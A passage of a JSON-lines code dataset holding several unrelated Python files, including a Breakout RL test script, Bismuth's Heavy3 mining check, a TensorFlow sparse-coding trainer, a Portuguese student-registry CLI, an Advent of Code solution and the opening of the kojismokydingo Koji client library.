os\nfrom models import Model1, Model2\n\nparser = argparse.ArgumentParser(\n description=\"\"\" python test_stack.py --name | -n [model1 | model2] --max_steps | -s [num (def 20000)] --ckpt | -c [str]\"\"\")\nparser.add_argument('--name', '-n', type=str, required=True,\n help='Name of the model to be tested')\nparser.add_argument('--max_steps', '-s', type=int,\n default=20000, help='Max Steps in the simulation')\nparser.add_argument('--ckpt', '-c', type=str,\n default=None, help='Checkpoint Name', required=True)\n\n\ndef play(model, max_steps):\n\n env = gym.make('BreakoutNoFrameskip-v4')\n env = gym.wrappers.Monitor(\n env, video_dir, force=True, video_callable=lambda _: True)\n s = preprocess(np.array(env.reset())).type(\n torch.FloatTensor).to(device)\n a = 1\n for i in range(max_steps):\n if i % 100 == 0:\n a = 1\n else:\n out = model(s)\n a = torch.argmax(out, axis=1).to(device_cpu).item()\n if a == 1 or a == 2:\n a += 1\n ns, _, done, _ = env.step(a)\n ns = preprocess(np.array(ns)).type(\n torch.FloatTensor).to(device)\n s = ns\n\n if done:\n break\n else:\n env.stats_recorder.save_complete()\n env.stats_recorder.done = True\n\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n model_name = args.name\n assert model_name in ['model1', 'model2']\n ckpt = args.ckpt\n max_steps = args.max_steps\n\n ckpt_path = './saved/' + model_name + '/' + ckpt + '.pt'\n video_dir = './agent/' + model_name + '/'\n\n device_cpu = torch.device('cpu')\n if torch.cuda.is_available():\n device = torch.device('cuda')\n\n else:\n device = device_cpu\n\n if model_name == 'model1':\n model = Model1().to(device)\n else:\n model = Model2().to(device)\n\n if os.path.exists(ckpt_path):\n with open(ckpt_path, 'rb') as f:\n saved_dict = torch.load(f)\n\n model.load_state_dict(saved_dict['model'])\n model.eval()\n\n else:\n raise ValueError('Checkpoint does not exists')\n\n preprocess = transforms.Compose([\n ChannelFirst(),\n transforms.Resize((84, 84)),\n transforms.Grayscale(),\n FrameStack(4)\n ])\n\n print('Starting test run')\n\n play(model, max_steps)\n\n video_id = 0\n for f in os.listdir(video_dir):\n\n if f.startswith('test') and f.endswith('.mp4'):\n video_id = max(video_id, int(f.replace('.mp4', '').split('_')[1]))\n\n video_id += 1\n\n for f in os.listdir(video_dir):\n if f.startswith('open') and f.endswith('.mp4'):\n os.rename(video_dir + f, video_dir +\n 'test_' + str(video_id) + '.mp4')\n elif f.startswith('open') and f.endswith('.meta.json'):\n os.rename(video_dir + f, video_dir +\n 'test_' + str(video_id) + '.meta.json')\n\n print('Completed')\n","repo_name":"Sykarius/PRL-Project","sub_path":"test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25468393399","text":"\"\"\"\nModularize the mining algo check\n\nBismuth Heavy3\n\nFrom bismuth node\n\"\"\"\n\nimport mmap\nimport os\nimport struct\nimport sys\nfrom hashlib import sha224\nfrom hmac_drbg import DRBG\nfrom quantizer import quantize_two, quantize_eight, quantize_ten\nfrom decimal import Decimal\n\nimport regnet\n\nfrom fork import Fork\nfork = Fork()\n\n__version__ = '0.1.4'\n\n\nprint(\"Mining_Heavy3 v{}\".format(__version__))\n\nRND_LEN = 0\n\nMMAP = None\nF = None\n\nis_regnet = False\nheavy = True\n\n\ndef read_int_from_map(map, index):\n return struct.unpack('I', map[4 * index:4 * index + 4])[0]\n\n\ndef anneal3(mmap, n):\n \"\"\"\n Converts 224 bits number into annealed version, hexstring\n\n :param n: a 224 = 7x32 bits\n :return: 56 char in hex encoding.\n \"\"\"\n h7 = n & 0xffffffff\n n = n >> 32\n index = ((h7 & ~0x7) % RND_LEN) * 4\n # f1 = struct.unpack('I', mmap[index:index + 4])[0]\n value = h7 ^ struct.unpack('I', mmap[index:index + 4])[0]\n res = \"{:08x}\".format(value)\n for i in range(6):\n index += 4\n h = n & 0xffffffff\n n = n >> 32\n value = h ^ struct.unpack('I', mmap[index:index + 4])[0]\n res = \"{:08x}\".format(value) + res\n return res\n\n\ndef anneal3_regnet(mmap, n):\n \"\"\"\n Converts 224 bits number into annealed version, hexstring\n This uses a fake anneal for easier regtests\n\n :param n: a 224 = 7x32 bits\n :return: 56 char in hex encoding.\n \"\"\"\n return \"{:056x}\".format(n)\n\n\ndef bin_convert(string):\n return ''.join(format(ord(x), '8b').replace(' ', '0') for x in string)\n\n\ndef diffme_heavy3(pool_address, nonce, db_block_hash):\n # minimum possible diff\n diff = 1\n diff_result = 0\n hash224 = sha224((pool_address + nonce + db_block_hash).encode(\"utf-8\")).digest()\n hash224 = int.from_bytes(hash224, 'big')\n if heavy or (not is_regnet):\n annealed_sha = anneal3(MMAP, hash224)\n else:\n annealed_sha = anneal3_regnet(MMAP, hash224)\n bin_annealed_sha = bin_convert(annealed_sha)\n mining_condition = bin_convert(db_block_hash)\n while mining_condition[:diff] in bin_annealed_sha:\n diff_result = diff\n diff += 1\n return diff_result\n\n\ndef check_block(block_height_new, miner_address, nonce, db_block_hash, diff0, received_timestamp, q_received_timestamp,\n q_db_timestamp_last, peer_ip='N/A', app_log=None):\n \"\"\"\n Checks that the given block matches the mining algo.\n\n :param block_height_new:\n :param miner_address:\n :param nonce:\n :param db_block_hash:\n :param diff0:\n :param received_timestamp:\n :param q_received_timestamp:\n :param q_db_timestamp_last:\n :param peer_ip:\n :param app_log:\n :return:\n \"\"\"\n try:\n if is_regnet:\n diff0 = regnet.REGNET_DIFF - 8\n\n real_diff = diffme_heavy3(miner_address, nonce, db_block_hash)\n diff_drop_time = Decimal(180)\n mining_condition = bin_convert(db_block_hash)[0:int(diff0)]\n # simplified comparison, no backwards mining\n if real_diff >= int(diff0):\n if app_log:\n app_log.info(\"Difficulty requirement satisfied for block {} from {}. {} >= {}\"\n .format(block_height_new, peer_ip, real_diff, int(diff0)))\n diff_save = diff0\n\n elif Decimal(received_timestamp) > q_db_timestamp_last + Decimal(diff_drop_time):\n # uses block timestamp, don't merge with diff() for security reasons\n factor = 1\n time_difference = q_received_timestamp - q_db_timestamp_last\n diff_dropped = quantize_ten(diff0) + quantize_ten(1) - quantize_ten(time_difference / diff_drop_time)\n # Emergency diff drop\n if Decimal(received_timestamp) > q_db_timestamp_last + Decimal(2 * diff_drop_time):\n factor = 10\n diff_dropped = quantize_ten(diff0) - quantize_ten(1) - quantize_ten(factor * (time_difference-2*diff_drop_time) / diff_drop_time)\n\n if diff_dropped < 50:\n diff_dropped = 50\n if real_diff >= int(diff_dropped):\n if app_log:\n app_log.info (\"Readjusted difficulty requirement satisfied for block {} from {}, {} >= {} (factor {})\"\n .format(block_height_new, peer_ip, real_diff, int(diff_dropped), factor))\n diff_save = diff0\n # lie about what diff was matched not to mess up the diff algo\n else:\n raise ValueError (\"Readjusted difficulty too low for block {} from {}, {} should be at least {}\"\n .format(block_height_new, peer_ip, real_diff, diff_dropped))\n else:\n raise ValueError (\"Difficulty {} too low for block {} from {}, should be at least {}\"\n .format(real_diff, block_height_new, peer_ip, diff0))\n return diff_save\n except Exception as e:\n # Left for edge cases debug\n print(\"MH3 check block\", e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n raise\n\n\ndef create_heavy3a(file_name=\"heavy3a.bin\"):\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file\")\n return\n print(\"Creating Junction Noise file, this usually takes a few minutes...\")\n gen = DRBG(b\"Bismuth is a chemical element with symbol Bi and atomic number 83. It is a pentavalent post-transition metal and one of the pnictogens with chemical properties resembling its lighter homologs arsenic and antimony.\")\n # Size in Gb - No more than 4Gb from a single seed\n GB = 1\n # Do not change chunk size, it would change the file content.\n CHUNK_SIZE = 1024*4 # time 3m20.990s\n COUNT = GB * 1024 * 1024 * 1024 // CHUNK_SIZE\n with open(file_name, 'wb') as f:\n for chunks in range(COUNT):\n f.write(gen.generate(CHUNK_SIZE))\n\n\ndef mining_open(file_name=\"heavy3a.bin\"):\n \"\"\"\n Opens the Junction MMapped file\n \"\"\"\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file to open\")\n return\n global F\n global MMAP\n global RND_LEN\n if os.path.isfile(file_name):\n size = os.path.getsize(file_name)\n if size != 1073741824:\n print(\"Invalid size of heavy file {}.\".format(file_name))\n try:\n os.remove(file_name)\n print(\"Deleted, Will be re-created\")\n except Exception as e:\n print(e)\n sys.exit()\n if not os.path.isfile(file_name):\n create_heavy3a(file_name)\n try:\n F = open(file_name, \"rb+\")\n # memory-map the file, size 0 means whole file\n MMAP = mmap.mmap(F.fileno(), 0)\n RND_LEN = os.path.getsize(file_name) // 4\n if read_int_from_map(MMAP, 0) != 3786993664:\n raise ValueError(\"Wrong file: {}\".format(file_name))\n if read_int_from_map(MMAP, 1024) != 1742706086:\n raise ValueError(\"Wrong file: {}\".format(file_name))\n except Exception as e:\n print(\"Error while loading Junction file: {}\".format(e))\n sys.exit()\n\n\ndef mining_close():\n \"\"\"\n Close the MMAP access, HAS to be called at end of program.\n \"\"\"\n if (not heavy) and is_regnet:\n print(\"Regnet, no heavy file to close\")\n return\n global F\n global MMAP\n try:\n assert MMAP\n MMAP.close()\n except:\n pass\n\n try:\n assert F\n F.close()\n except:\n pass\n","repo_name":"bismuthfoundation/Bismuth","sub_path":"mining_heavy3.py","file_name":"mining_heavy3.py","file_ext":"py","file_size_in_byte":7572,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"29"} +{"seq_id":"4839687234","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport helper_functions as hf\nimport os\nimport IPython\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n## User-defined parameters\nn_ = 784 # Num_pixels\nm_ = 400 # Num_elements\nlamb_ = 0.50 # Threshold potential (sparseness penalty scaling)\ndt_ = 0.001 # [s] discrete time constant\ntau_ = 0.01 # [s] LCA time constant\nlr_ = 0.05 # Learning rate for weight updates (will be divided by batch_)\nbatch_ = 100 # Number of images in a batch\nnum_steps_ = 20 # Number of steps to run LCA\nnum_trials_ = 30000 # Number of batches to learn weights\ndisplay_ = 100 # How often to display status updates\n\ntf.set_random_seed(1234567890)\nnp.random.seed(1234567890)\n\n## Setup data\ndataset = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n## Setup constants & placeholders\ns = tf.placeholder(tf.float32, shape=[n_, None], name=\"input\") # Placeholder for data\neta = tf.placeholder(tf.float32, shape=(), name=\"lca_update\") # Placeholder for LCA update rate\nweight_lr = tf.placeholder(tf.float32, shape=(), name=\"weight_lr\") # Placeholder for Phi update rule\n\n## Initialize membrane potential\nu = tf.Variable(np.zeros([m_, batch_], dtype=np.float32), trainable=False, name=\"membrane_potential\")\na = tf.select(tf.greater(u, lamb_), u-lamb_, tf.zeros(shape=tf.shape(u)), name=\"thresholded_u\")\n\n## Initialize dictionary\nphi = tf.Variable(tf.nn.l2_normalize(tf.truncated_normal([n_, m_], mean=0.0,\n stddev=1.0, dtype=tf.float32, name=\"phi_init\"), dim=1, name=\"row_l2_norm\"), name=\"phi\")\n\n## Reconstruction variable\ns_ = tf.matmul(phi, a, name=\"reconstruction\")\n\n## Loss functions\neuclidean_loss = 0.5 * tf.reduce_sum(tf.pow(tf.sub(s, s_), 2.0))\nsparse_loss = lamb_ * tf.reduce_sum(tf.abs(a))\nunsupervised_loss = euclidean_loss + sparse_loss\n\n## Discritized membrane update rule\ndu = tf.sub(tf.sub(tf.matmul(tf.transpose(phi), s),\n tf.matmul(tf.matmul(tf.transpose(phi), phi)\n - tf.constant(np.identity(int(phi.get_shape()[1]), dtype=np.float32), name=\"identity_matrix\"), a)), u)\n\nstep_lca = tf.group(u.assign_add(eta * du))\n\n## Discritized weight update rule\nphi_optimizer = tf.train.GradientDescentOptimizer(weight_lr, name=\"grad_optimizer\")\nauto_gradient = phi_optimizer.compute_gradients(unsupervised_loss, var_list=[phi])\n\nmanual_gradient = -tf.matmul(tf.sub(s, s_), tf.transpose(a))\n\n#step_phi = phi_optimizer.apply_gradients([(manual_gradient, phi)])\nstep_phi = phi_optimizer.apply_gradients(auto_gradient)\n\n## Weight normalization\nnormalize_phi = tf.group(phi.assign(tf.nn.l2_normalize(phi, dim=1,\n epsilon=1e-12, name=\"row_l2_norm\")), name=\"do_normalization\")\n\npSNRdB = tf.mul(10.0, tf.log(255.0**2\n / ((1.0 / float(n_)) * tf.reduce_sum(tf.pow(tf.sub(s, s_), 2.0)))),\n name=\"recon_quality\")\n\nwith tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for trial in range(num_trials_):\n norm_input = hf.normalize_image(dataset.train.next_batch(batch_)[0]).T # don't need labels\n for t in range(num_steps_):\n step_lca.run({s:norm_input, eta:dt_/tau_})\n step_phi.run({s:norm_input, weight_lr:float(lr_)/float(batch_)})\n normalize_phi.run()\n if trial % display_ == 0:\n sparsity = 100*np.count_nonzero(a.eval())/np.float32(np.size(a.eval()))\n print(\"Finished trial %g\"%(trial))\n print(\"\\tmax val of u:\\t%g\"%(u.eval().max()))\n print(\"\\tpercent active:\\t%g\"%(sparsity))\n print(\"\\tRecon pSNRdB:\\t%g\"%(pSNRdB.eval({s:norm_input})))\n print(\"\\teuclidean loss:\\t%g\"%(euclidean_loss.eval({s:norm_input, u:u.eval(), phi:phi.eval()})))\n print(\"\\tsparse loss:\\t%g\"%(sparse_loss.eval({u:u.eval()})))\n print(\"\\ttotal loss:\\t%g\"%(unsupervised_loss.eval({s:norm_input, u:u.eval(), phi:phi.eval()})))\n _ = hf.save_data_tiled(tf.transpose(phi).eval().reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='Dictionary for trial number '+str(trial),\n save_filename=\"outputs/phi_\"+str(trial)+\".pdf\")\n #IPython.embed()\n _ = hf.save_data_tiled(tf.transpose(auto_gradient[0][0]).eval({s:norm_input, weight_lr:float(lr_)/float(batch_)}).reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='TF computed phi gradient for trial number '+str(trial),\n save_filename=\"outputs/dphi_auto_\"+str(trial)+\".pdf\")\n _ = hf.save_data_tiled(tf.transpose(manual_gradient).eval({s:norm_input, weight_lr:float(lr_)/float(batch_)}).reshape(m_, int(np.sqrt(n_)), int(np.sqrt(n_))),\n title='Manually computed phi gradient for trial number '+str(trial),\n save_filename=\"outputs/dphi_manual_\"+str(trial)+\".pdf\")\n\n IPython.embed()\n","repo_name":"dpaiton/EntropyCoding","sub_path":"python/tensorFlow/lca_test.py","file_name":"lca_test.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17460239184","text":"\"\"\"\ndata_preprocess.views.serializers.CleanDataAssetGetSerializer.py\n================================================================\nMódulo para la definición del serializador del modelo de datos\ndel activo de datos limpio\n\"\"\"\n\nfrom rest_framework import serializers\nfrom data_preprocess.models.storage.CleanDataAsset import CleanDataAsset\n\n\nclass CleanDataAssetGetSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CleanDataAsset\n fields = ('code', 'context', 'registry_date',\n 'updated_on', 'data_mining_task', 'input_variables',\n 'response_variable', 'number_of_classes',\n 'clean_data')\n","repo_name":"ronaldraxon/dauruxu","sub_path":"aplicacion/dauruxu/data_preprocess/views/serializers/CleanDataAssetGetSerializer.py","file_name":"CleanDataAssetGetSerializer.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24145346412","text":"import config, utils, files, console\n\nstudents = {}\n\n\ndef storeRemoved(name, email, reason):\n with open(\"txtSrc/deleted.txt\", mode=\"a\", encoding=\"utf-8\") as file:\n file.write(f\"Nome: {name}\\nE-mail: {email}\\nMotivo: {reason}\\n\")\n\n\ndef clearRemoved():\n with open(\"txtSrc/deleted.txt\", mode=\"w\", encoding=\"utf-8\") as file:\n file.write(\"\")\n\n\ndef printRemoved():\n files.printFile(\"deleted\")\n\n\ndef showHelp():\n files.printFile(\"help\")\n\n\ndef findKeyByValue(value):\n global students\n\n if value not in students.values():\n return None\n else:\n return list(students.keys())[list(students.values()).index(value)]\n\n\ndef printStudent(name):\n global students\n\n print(f\"Nome: {name}\\nE-mail: {students[name]}\")\n\n\ndef showSortedByRegister():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada por cadastro):\")\n for name in students.values():\n printStudent(findKeyByValue(name))\n\n\ndef showSortedByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada alfabeticamente por Nome):\")\n for name in sorted(students.keys()):\n printStudent(name)\n\n\ndef showSortedByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n else:\n print(\"Lista de alunos (ordenada alfabeticamente por E-mail):\")\n for email in sorted(students.values()):\n printStudent(findKeyByValue(email))\n\n\ndef searchByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno: \")\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n printStudent(name)\n\n\ndef searchByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno: \").strip().lower()\n if email not in students.values():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n printStudent(findKeyByValue(email))\n\n\ndef registerStudent():\n global students\n\n registerAmount = 0\n try:\n registerAmount = int(input(\"Digite quantos alunos, deseja cadastrar: \"))\n except ValueError:\n print(\"\\n[Error] Opção inválida, por favor tente novamente mais tarde.\")\n return \n \n for _i in range(registerAmount):\n name = input(\"Digite o nome completo do aluno: \").strip().title()\n email = input(\"Digite o e-mail do aluno: \").strip().lower()\n\n if utils.isEmpty(name) or utils.isEmpty(email):\n print(\"[Erro] Não cadastramos informações em branco.\")\n else:\n students.update({name: email})\n\n\ndef removeByName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno a ser removido: \").strip().title()\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n reason = input(\"Motivo da exclusão: \")\n storeRemoved(name, students[name], reason)\n del students[name]\n\n\ndef removeByEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno a ser removido: \").strip().lower()\n name = findKeyByValue(email)\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n reason = input(\"Motivo da exclusão: \")\n storeRemoved(name, students[name], reason)\n del students[name]\n\n\ndef updateName():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n name = input(\"Nome do aluno a ser atualizado: \").strip().title()\n if name not in students.keys():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n newName = input(\"Novo nome: \").strip().title()\n students[newName] = students[name]\n del students[name]\n\n\ndef updateEmail():\n global students\n\n if utils.isEmpty(students):\n print(\"[Erro] Nenhum aluno cadastrado.\")\n return\n\n email = input(\"E-mail do aluno a ser atualizado: \").strip().lower()\n if email not in students.values():\n print(\"[Erro] Aluno não encontrado.\")\n else:\n newEmail = input(\"Novo e-mail: \").strip().lower()\n students[findKeyByValue(email)] = newEmail\n\n\ndef updateUsername():\n newUsername = input(\"Digite o novo login do administrador: \")\n files.inputFile(\"login\", newUsername)\n\n\ndef updatePassword():\n print(\"Obs: A senha precisa ter entre 4 á 8 digitos\\n\")\n newPassword = input(\"Digite a nova senha do administrador: \")\n if len(newPassword) >= 4 and len(newPassword) <= 8:\n files.inputFile(\"senha\", config.encrypt(newPassword))\n console.animated(\"Criptografando senha\")\n else:\n print(\"[Erro] Não foi possivel cadastrar essa senha\")\n\n\ndef restoreLogin():\n files.inputFile(\"login\", config.defaultLogin)\n files.inputFile(\"senha\", config.encrypt(config.defaultPassword))\n console.animated(\"Restaurando\")\n print(\"Login de administrador restaurado\")\n\n\ndef stopExecution():\n exit()\n\n\nCOMMANDS = {\n \"help\": showHelp,\n \"register\": registerStudent,\n \"list/r\": showSortedByRegister,\n \"list/n\": showSortedByName,\n \"list/e\": showSortedByEmail,\n \"list/b\": printRemoved,\n \"clearbin\": clearRemoved,\n \"search/n\": searchByName,\n \"search/e\": searchByEmail,\n \"remove/n\": removeByName,\n \"remove/e\": removeByEmail,\n \"restore/a\": restoreLogin,\n \"update/n\": updateName,\n \"update/e\": updateEmail,\n \"update/l\": updateUsername,\n \"update/p\": updatePassword,\n \"end\": stopExecution,\n}\n\nCOMMAND_LIST = COMMANDS.keys()\n\n\ndef queryCommand():\n print(\"Digite \\\"help\\\" para ver o menu de opções\")\n chosenCommand = input(\"\\n> \").strip().lower()\n if chosenCommand not in COMMAND_LIST:\n print(\"[Erro] Comando não encontrado.\")\n else:\n print()\n COMMANDS[chosenCommand]()\n print()\n\n\ndef main():\n console.clearScreen()\n config.loginAdm()\n console.clearScreen()\n while True:\n queryCommand()\n\n\nif __name__ == \"__main__\":\n main()\n \n \n","repo_name":"rntsilv/Project-University---Anhembi-Morumbi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39753552403","text":"#!/usr/bin/python3\n\nfh = open(\"input.txt\", mode='r')\nintxt = fh.read()\nfh.close()\n\ndl = intxt.strip().split(\"\\n\")\n\nx, y, f = 0, 0, 0\n\ndt = { 0: 'E', 90: 'S', 180: 'W', 270: 'N' }\n\ndef getdir(f, oa):\n f += oa\n \n if f > 270: \n f -= 360\n elif f < 0:\n f += 360\n\n return f\n \n\nfor i in dl:\n oc = i[0]\n oa = int(i[1:])\n \n if oc == \"R\": f = getdir(f, oa)\n if oc == \"L\": f = getdir(f, oa * -1)\n \n if oc == \"F\": oc = dt.get(f)\n if oc == \"N\": y += oa\n if oc == \"S\": y -= oa\n if oc == \"E\": x += oa\n if oc == \"W\": x -= oa\n \nprint(x, y, abs(x) + abs(y))","repo_name":"aaftre/AdventofCode","sub_path":"2020/Day12/Part1/Day12a.py","file_name":"Day12a.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20087449297","text":"\"\"\"\nhere we are going to run everything\n\"\"\"\n\nimport prepare_data, models, visualisations\n\n# prepare our data to train\nX, y = prepare_data.prepare_data()\n\n# let's see result for the easiest model - just simple linear regression\nlinear_regression_R2, linear_regression_MSE = models.count_linear_regression(X, y)\nprint('linear_regression_R2: ' , linear_regression_R2, ' linear_regression_MSE: ', linear_regression_MSE)\n\n# let's check our regression with gradient boosting, first search for best parameters and that train our model on it\ngbr_R2, gbr_MSE = models.train_best_gb_regression(X,y)\nprint('best_gb_regression_R2 : ', gbr_R2, ' best_gb_regression_MSE : ', gbr_MSE)\n\n# let's check our regression with gradient boosting, first search for best parameters and that train our model on it\nxgb_R2, xgb_MSE = models.train_best_extreme_gb(X, y)\nprint('best_XGBoost_R2 : ', xgb_R2, ' best_XGBoost_MSE : ', xgb_MSE)\n\n\n# ok, now we can compare our models and visualize their scores\nR2_scores = [linear_regression_R2, gbr_R2, xgb_R2]\nMSE_scores = [abs(linear_regression_MSE), abs(gbr_MSE), abs(xgb_MSE)]\nmodels_to_compare = ['linear_regression', 'Best GBRegressor', 'xgboost']\n\nprint('R2_scores: ', R2_scores)\nprint('MSE_scores: ', MSE_scores)\n\nvisualisations.plot_score(models_to_compare, R2_scores,'R2')\nvisualisations.plot_score(models_to_compare, MSE_scores,'MSE')\n\n# we see that even our best score is not the best -> probably we should come back to the beginning\n# and dive deeper into data, then if it won't help, we may play with different methods and it's parameters\n# however it's not complicated case (just predicting price from numerical data) it might be a need to split\n# the whole dataset on some specific clusters and create different models for each cluster\n","repo_name":"OliwiaW/predict_house_prices","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16932423524","text":"# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library; if not, see .\n\n\n\"\"\"\nKoji Smoky Dingo - Client utilities for working with the Koji\nbuild system\n\n:author: Christopher O'Brien \n:license: GPL v3\n\"\"\"\n\n\nfrom functools import partial\nfrom koji import (\n ClientSession, Fault, GenericError, ParameterError,\n convertFault, read_config)\nfrom koji_cli.lib import activate_session, ensure_connection\nfrom logging import DEBUG, basicConfig\nfrom typing import (\n Any, Callable, Dict, Iterator, Iterable, List,\n Optional, Sequence, TypeVar, Tuple, Union, cast)\n\nfrom .common import chunkseq\nfrom .types import (\n ArchiveInfo, ArchiveInfos, ArchiveSpec,\n BuildInfo, BuildSpec,\n ChannelInfo, ChannelSpec,\n HostInfo, HostSpec,\n HubVersionSpec,\n PackageInfo, PackageSpec,\n RepoInfo, RepoSpec,\n RPMInfo, RPMInfos, RPMSignature, RPMSpec,\n TagInfo, TagSpec,\n TargetInfo, TargetSpec,\n TaskInfo, TaskSpec,\n UserInfo, UserSpec, )\n\n\n__all__ = (\n \"AnonClientSession\",\n \"BadDingo\",\n \"FeatureUnavailable\",\n \"ManagedClientSession\",\n \"NoSuchArchive\",\n \"NoSuchBuild\",\n \"NoSuchChannel\",\n \"NoSuchContentGenerator\",\n \"NoSuchHost\",\n \"NoSuchPackage\",\n \"NoSuchPermission\",\n \"NoSuchRepo\",\n \"NoSuchRPM\",\n \"NoSuchTag\",\n \"NoSuchTarget\",\n \"NoSuchTask\",\n \"NoSuchUser\",\n \"NotPermitted\",\n \"ProfileClientSession\",\n\n \"as_archiveinfo\",\n \"as_buildinfo\",\n \"as_channelinfo\",\n \"as_hostinfo\",\n \"as_packageinfo\",\n \"as_repoinfo\",\n \"as_rpminfo\",\n \"as_taginfo\",\n \"as_targetinfo\",\n \"as_taskinfo\",\n \"as_userinfo\",\n \"bulk_load\",\n \"bulk_load_build_archives\",\n \"bulk_load_build_rpms\",\n \"bulk_load_builds\",\n \"bulk_load_buildroot_archives\",\n \"bulk_load_buildroot_rpms\",\n \"bulk_load_buildroots\",\n \"bulk_load_rpm_sigs\",\n \"bulk_load_tags\",\n \"bulk_load_tasks\",\n \"bulk_load_users\",\n \"hub_version\",\n \"iter_bulk_load\",\n \"version_check\",\n \"version_require\",\n)\n\n\nclass ManagedClientSession(ClientSession):\n \"\"\"\n A `koji.ClientSession` that can be used as via the ``with``\n keyword to provide a managed session that will handle\n authenticated login and logout.\n\n :since: 1.0\n \"\"\"\n\n def __enter__(self):\n self.activate()\n return self\n\n\n def __exit__(self, exc_type, _exc_val, _exc_tb):\n self.logout()\n if self.rsession:\n self.rsession.close()\n self.rsession = None\n return (exc_type is None)\n\n\n def activate(self):\n \"\"\"\n Invokes `koji_cli.lib.activate_session` with this session's\n options, which will trigger the appropriate login method.\n\n :since: 2.0\n \"\"\"\n return activate_session(self, self.opts)\n\n\n @property\n def logger(self):\n # a cached copy of `logging.getLogger('koji')`, assigned\n # during `ClientSession.__init__` invocation. There are some\n # code paths in the underlying ClientSession which will\n # presume that logging handlers have been configured, without\n # checking that they actually have been. This is likely\n # because the koji command-line interface sets up that logger\n # shortly after parsing initial CLI args. However, when a\n # script uses a ClientSession, that setup won't have\n # happened. Then if the script encounters an error along one\n # of those code paths, an additional logging warning will be\n # output after that path attempts to log at some unconfigured\n # level. This property allows us to set a default\n # configuration if one hasn't been given yet, just before the\n # instance would attempt to use the logger.\n\n logger = self._logger\n if logger and not logger.handlers:\n basicConfig()\n\n # the koji CLI will use the --debug and --quiet options to\n # determine the logger level. However, only the debug\n # option is recorded as part of the session options. We'll\n # mimic as much of the logging behavior as we can\n opts = self.opts\n if opts.get('debug') or opts.get('debug_xmlrpc'):\n logger.setLevel(DEBUG)\n\n return logger\n\n\n @logger.setter\n def logger(self, logger):\n self._logger = logger\n\n\nclass ProfileClientSession(ManagedClientSession):\n \"\"\"\n A `koji.ClientSession` which loads profile config information and\n which can be used via tha ``with`` keyword.\n\n :since: 1.0\n \"\"\"\n\n def __init__(self, profile: str = \"koji\"):\n \"\"\"\n :param profile: name of the koji profile to load from local\n configuration locations\n \"\"\"\n\n conf = read_config(profile)\n server = conf[\"server\"]\n super().__init__(server, opts=conf)\n\n\nclass AnonClientSession(ProfileClientSession):\n \"\"\"\n A `koji.ClientSession` which loads profile config information and\n which can be used via the ``with`` keyword.\n\n Suitable for working with anonymous commands which do not require\n authentication. Does not authenticate, and will only connect\n lazily.\n\n :since: 1.0\n \"\"\"\n\n def __enter__(self):\n # we could always set up a connection ahead of time,\n # but... the connection will be created when we make our first\n # call, so let's be lazy instead.\n\n # ensure_connection(self)\n return self\n\n\n def activate(self):\n \"\"\"\n Ensures the anonymous session is connected, but does not attempt\n to login.\n\n :since: 2.0\n \"\"\"\n\n ensure_connection(self)\n\n\nclass BadDingo(Exception):\n \"\"\"\n Generalized base class for exceptions raised from kojismokydingo.\n This class and its subclasses are used to combine a fixed\n complaint string with some specific information. This is a\n convenience primarily for the CLI, 